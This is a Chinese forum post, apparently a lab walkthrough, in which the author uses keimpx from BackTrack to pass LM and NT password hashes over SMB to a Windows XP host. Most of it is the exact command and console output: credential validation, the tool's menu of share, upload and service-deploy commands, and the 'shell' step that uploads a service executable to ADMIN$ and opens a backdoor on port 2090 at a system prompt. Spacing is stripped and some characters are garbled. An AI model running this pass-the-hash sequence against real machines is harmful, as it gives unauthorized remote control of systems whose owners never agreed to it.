测试目标机器是winxp,ip:192.168.1.5。由于不是域机器,所以事先我关闭了防火墙和使用简单文件共享(打开我的文档->工具->文件夹选项->查看->去掉使用简单文件共享前的√)。
运行命令:
root@bt:/pentest/passwords/keimpx#./keimpx.py-t192.168.1.5-v1-p445-Uiishelp--nt=ccf9155e3e7db453aad3b435b51404ee--lm=3dbde697d71690a769204beb12283678
回显(其中以下的红字是让你选择的和我输的命令):
ThisproductincludessoftwaredevelopedbyCORESecurityTechnologies
(http://www.coresecurity.com),PythonImpacketlibrary
keimpx0.2
byBernardoDameleA.G.<bernardo.damele@gmail.com>
[13:46:20][INFO]Loadingtargets
[13:46:20][INFO]Loadingcredentials
[13:46:20][INFO]Loadingdomains
[13:46:20][INFO]Loaded1uniquetargets
[13:46:20][INFO]Loaded1uniquecredentials
[13:46:20][INFO]Nodomainsspecified,usingNULLdomain
[13:46:20][INFO]Attackinghost192.168.1.5:445
[13:46:20][INFO]Validcredentialson192.168.1.5:445:iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
[13:46:20][INFO]Attackonhost192.168.1.5:445finished
Thecredentialsworkedintotal1times
TARGETSORTEDRESULTS:
192.168.1.5:445
iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
USERSORTEDRESULTS:
iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
192.168.1.5:445
Doyouwanttogetashellfromanyofthetargets?[Y/n]
Whichtargetdoyouwanttoconnectto?
[1]192.168.1.5:445
>1
Whichcredentialsdoyouwanttousetoconnect?
[1]iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
>1
[13:46:35][INFO]type'help'forhelpmenu
#help
Genericoptions
===============
help-showthismessage
verbosity{level}-setverbositylevel(0-2)
info-listsysteminformation
exit-terminatestheSMBsessionandexitfromthetool
Sharesoptions
==============
shares-listavailableshares
use{sharename}-connecttoanspecificshare
cd{path}-changesthecurrentdirectoryto{path}
pwd-showscurrentremotedirectory
ls{path}-listsallthefilesinthecurrentdirectory
cat{file}-displaycontentoftheselectedfile
download{filename}-downloadsthefilenamefromthecurrentpath
upload{filename}-uploadsthefilenameintothecurrentpath
mkdir{dirname}-createsthedirectoryunderthecurrentpath
rm{file}-removestheselectedfile
rmdir{dirname}-removesthedirectoryunderthecurrentpath
Servicesoptions
================
deploy{servicename}{localfile}[serviceargs]-deployremotelyaserviceexecutable
undeploy{servicename}{remotefile}-undeployremotelyaserviceexecutable
Shelloptions
=============
shell[port]-spawnashelllisteningonaTCPport,bydefault2090/tcp
Usersoptions
=============
users[domain]-listusers,optionallyforaspecificdomain
pswpolicy[domain]-listpasswordpolicy,optionallyforaspecificdomain
domains-listdomainstowhichthesystemispartof
Registryoptions(Soon)
================
regread{registrykey}-readaregistrykey
regwrite{registrykey}{registryvalue}-addavaluetoaregistrykey
regdelete{registrykey}-deletearegistrykey
#shell
[13:47:09][INFO]Uploadingtheserviceexecutableto'ADMIN$\urakxn.exe'
[13:47:09][INFO]ConnectingtotheSVCCTLnamedpipe
[13:47:09][INFO]Creatingtheservice'Ynohkb'
[13:47:09][INFO]Startingtheservice'Ynohkb'
[13:47:09][INFO]Connectingtobackdooronport2090,wait..
MicrosoftWindowsXP[\ufffd\u6c7e5.1.2600]
(C)\ufffd\ufffd\u0228\ufffd\ufffd\ufffd\ufffd1985-2001MicrosoftCorp.
C:\WINDOWS\system32>
*
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡